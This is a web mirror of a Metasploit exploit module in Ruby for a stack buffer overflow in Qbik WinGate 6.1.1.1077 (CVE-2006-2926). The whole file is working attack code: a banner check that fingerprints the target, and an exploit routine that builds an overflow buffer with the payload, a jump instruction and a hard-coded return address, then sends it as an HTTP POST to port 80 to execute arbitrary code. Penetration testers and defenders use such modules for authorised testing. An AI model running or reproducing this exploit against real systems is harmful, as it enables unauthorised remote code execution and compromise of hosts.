Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Qbik WinGate WWW Proxy Server URL Processing Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Qbik WinGate version

18
          6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the

19
          HTTP proxy service on port 80, a remote attacker could overflow

20
          a buffer and execute arbitrary code.

21
        },

22
        'Author' => 'aushack',

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2006-2926' ],

26
          [ 'OSVDB', '26214' ],

27
          [ 'BID', '18312' ],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
          'AllowWin32SEH' => true

32
        },

33
        'Payload' => {

34
          'Space' => 1000,

35
          'BadChars' => "\x00\x0a\x0d\x20+&=%\/\\\#;\"\':<>?",

36
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,

37
          'StackAdjustment' => -3500,

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [ 'WinGate 6.1.1.1077', { 'Ret' => 0x01991932 } ], # call esi

42
        ],

43
        'Privileged' => true,

44
        'DisclosureDate' => '2006-06-07',

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        Opt::RPORT(80)

57
      ]

58
    )

59
  end

60


61
  def check

62
    connect

63
    sock.put("GET /\r\n\r\n") # Malformed request to get proxy info

64
    banner = sock.get_once || ''

65
    if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/)

66
      return Exploit::CheckCode::Appears

67
    end

68


69
    return Exploit::CheckCode::Safe

70
  end

71


72
  def exploit

73
    connect

74


75
    print_status("Trying target #{target.name}...")

76


77
    buff = Rex::Text.rand_text_alphanumeric(3000)

78
    buff[1200, 1000] = payload.encoded # jmp here

79
    buff[2200, 5] = Rex::Arch::X86.jmp(-1005) # esi

80
    buff[2284, 4] = [target['Ret']].pack('V') # eip

81


82
    sploit = "POST http://#{buff}/ HTTP/1.0\r\n\r\n"

83


84
    sock.put(sploit)

85
    sock.get_once(-1, 3)

86


87
    handler

88
    disconnect

89
  end

90
end

91


92